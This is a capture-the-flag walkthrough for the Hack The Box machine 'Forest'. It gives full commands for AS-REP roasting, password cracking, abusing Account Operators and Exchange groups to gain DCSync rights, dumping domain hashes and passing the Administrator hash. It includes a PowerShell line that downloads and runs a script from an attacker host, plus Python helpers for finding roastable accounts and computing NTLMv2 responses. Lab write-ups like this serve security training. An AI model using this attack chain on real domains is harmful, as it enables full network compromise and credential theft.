
Forest - Walkthrough

Forest is an easy Windows machine that showcases a Domain Controller (DC) for a domain in which Exchange Server has been installed. The DC allows anonymous LDAP binds, which are used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes, compromising the system.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.10.161 -oG allPorts

The scan reveals numerous AD-related ports: Kerberos (88), LDAP (389), SMB (445), WinRM (5985), and others indicating a Windows Domain Controller.

A targeted scan shows:

  • OS: Windows Server 2016 Standard
  • Domain: htb.local
  • Hostname: FOREST

We enumerate LDAP anonymously:

ldapsearch -H ldap://10.10.10.161 -x -b "dc=htb,dc=local"

Among the returned objects is a service account, svc-alfresco, in the Service Accounts OU. The same dump exposes every user's userAccountControl attribute, which is where the flag that makes the next step possible lives.
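The anonymous dump is what tells you which accounts can be attacked without credentials: the DONT_REQ_PREAUTH bit (0x400000) in userAccountControl marks accounts that do not require Kerberos pre-authentication. The following is an added example, not code from the walkthrough: it parses a constructed ldapsearch-style excerpt, decodes the flags, lists the roastable accounts, and prints the server-side filter you would use instead of pulling the whole directory. The entries, their DNs and the flag values are constructed for illustration (the svc-alfresco entry is modelled on the Forest DC); only the bit definitions and the matching-rule OID are real.

```python
import re

# userAccountControl bits (MS-ADTS); only the ones used here
ACCOUNTDISABLE   = 0x0002
NORMAL_ACCOUNT   = 0x0200
DONT_REQ_PREAUTH = 0x400000          # 4194304: Kerberos pre-auth not required

# LDAP extensible-match rule for "bitwise AND" (LDAP_MATCHING_RULE_BIT_AND)
BIT_AND = "1.2.840.113556.1.4.803"

# Constructed excerpt in the shape ldapsearch prints. The svc-alfresco entry is
# modelled on the Forest DC; the other two are made up for contrast.
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=Administrator,CN=Users,DC=htb,DC=local
sAMAccountName: Administrator
userAccountControl: 66048

dn: CN=Guest,CN=Users,DC=htb,DC=local
sAMAccountName: Guest
userAccountControl: 66082
"""

def parse_ldif(text):
    """Split an ldapsearch dump into one dict per entry (first value per attribute; no base64 handling)."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            if ":" in line and not line.startswith("#"):
                key, value = line.split(":", 1)
                entry.setdefault(key.strip(), value.strip())
        if entry:
            entries.append(entry)
    return entries

def decode_uac(value):
    """Names of the flags we care about that are set in a userAccountControl value."""
    flags = {"ACCOUNTDISABLE": ACCOUNTDISABLE, "NORMAL_ACCOUNT": NORMAL_ACCOUNT,
             "DONT_REQ_PREAUTH": DONT_REQ_PREAUTH}
    return sorted(name for name, bit in flags.items() if value & bit)

def asrep_roastable(entries):
    """Enabled accounts that do not require pre-auth: the candidates to feed GetNPUsers."""
    hits = []
    for e in entries:
        uac = int(e.get("userAccountControl", "0"))
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(e["sAMAccountName"])
    return hits

def roastable_filter():
    """Server-side equivalent of asrep_roastable(), usable as an ldapsearch filter."""
    return (f"(&(objectCategory=person)(userAccountControl:{BIT_AND}:={DONT_REQ_PREAUTH})"
            f"(!(userAccountControl:{BIT_AND}:={ACCOUNTDISABLE})))")

if __name__ == "__main__":
    for e in parse_ldif(SAMPLE_LDIF):
        print(e["sAMAccountName"], decode_uac(int(e["userAccountControl"])))
    print("AS-REP roastable:", asrep_roastable(parse_ldif(SAMPLE_LDIF)))
    print("ldapsearch filter:", roastable_filter())
```

To run it against the real box, pipe the output of the ldapsearch above into parse_ldif, or pass roastable_filter() as the filter argument of ldapsearch so the DC does the selection for you.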

Foothold

The account has the DONT_REQ_PREAUTH flag set, so the KDC hands an AS-REP to anyone who asks for it. Part of that reply is encrypted with a key derived from the account's password, which makes it crackable offline (AS-REP roasting):

python3 GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
svc-alfresco@HTB.LOCAL:3cfc034f6ddce4afc32faf03717f5b1a$...

We crack the hash with John:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Username        Password
svc-alfresco    s3rvice

We connect via WinRM:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

User flag obtained:

cat C:\Users\svc-alfresco\Desktop\user.txt

User flag: 2d1743e78e533c0e89fa932787985b41

Privilege Escalation

We use BloodHound to enumerate the domain:

bloodhound-python -d 'htb.local' -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

BloodHound reveals that svc-alfresco is a member of Account Operators, a built-in group that can create accounts and edit the membership of groups that are not protected by AdminSDHolder. One such group, Exchange Windows Permissions, holds WriteDacl on the domain object itself (a side effect of the Exchange installation), so we create a new user and add it to that group:

net user hector password /add /domain
net group "Exchange Windows Permissions" hector /add /domain
net localgroup "Remote Management Users" hector /add

We load PowerView and, authenticating as the new user so the access token reflects the fresh group membership, use the group's WriteDacl on the domain object to grant that user DCSync rights (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights):

IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.10/PowerView.ps1")
$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\hector',$pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hector -Rights DCSync

With those rights in place we perform a DCSync, asking the DC to replicate its secrets over DRSUAPI the way another domain controller would, and dump the hashes:

secretsdump.py htb/hector:password@10.10.10.161

Administrator NT hash: 32693b11e6aa90eb43d32c72a07ceea6

NTLM authentication needs only the NT hash, not the password, so we pass it straight to psexec.py. The -hashes argument is LM:NT; the LM half is unused and can be left empty:

psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
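The reason an uncracked hash is enough: NTLMv2 never uses the password directly. The client derives NTOWFv2 with HMAC-MD5 keyed by the NT hash and answers the server challenge with another HMAC-MD5, so whoever holds the hash can produce a valid response. The block below is an added example, not impacket's code: it computes the response a pass-the-hash client would send, using the Administrator NT hash from the DCSync output with a constructed server challenge, timestamp and minimal AV_PAIR list. Session key, MIC and the message framing are left out.

```python
import hmac, hashlib, struct

def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed by the NT hash over UTF-16LE(UPPER(user) + domain)."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()

def client_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: RespType, HiRespType, 6 reserved, FILETIME, 8-byte nonce,
    4 reserved, AvPairs, 4 reserved (the 'temp' value of MS-NLMP 3.3.2)."""
    assert len(client_challenge) == 8
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)

def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr || blob, NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob)."""
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob

# Constructed inputs: the Administrator NT hash from the DCSync above, a made-up server
# challenge, a zero timestamp and an AV_PAIR list containing only MsvAvEOL.
ADMIN_NT = bytes.fromhex("32693b11e6aa90eb43d32c72a07ceea6")
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
BLOB = client_blob(0, bytes.fromhex("aabbccddeeff0011"), b"\x00\x00\x00\x00")

if __name__ == "__main__":
    resp = ntlmv2_response(ADMIN_NT, "Administrator", "HTB", SERVER_CHALLENGE, BLOB)
    print("NTProofStr:", resp[:16].hex())
```

Nothing in that computation requires the MD4 step that produced the hash, which is exactly why NT hashes have to be treated as password-equivalent and why a DCSync result is a full compromise, not a list of things still to crack.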

Root flag obtained:

type C:\Users\Administrator\Desktop\root.txt

Root flag: eb58b2d6a6c0bb761d4e271a45d83c6b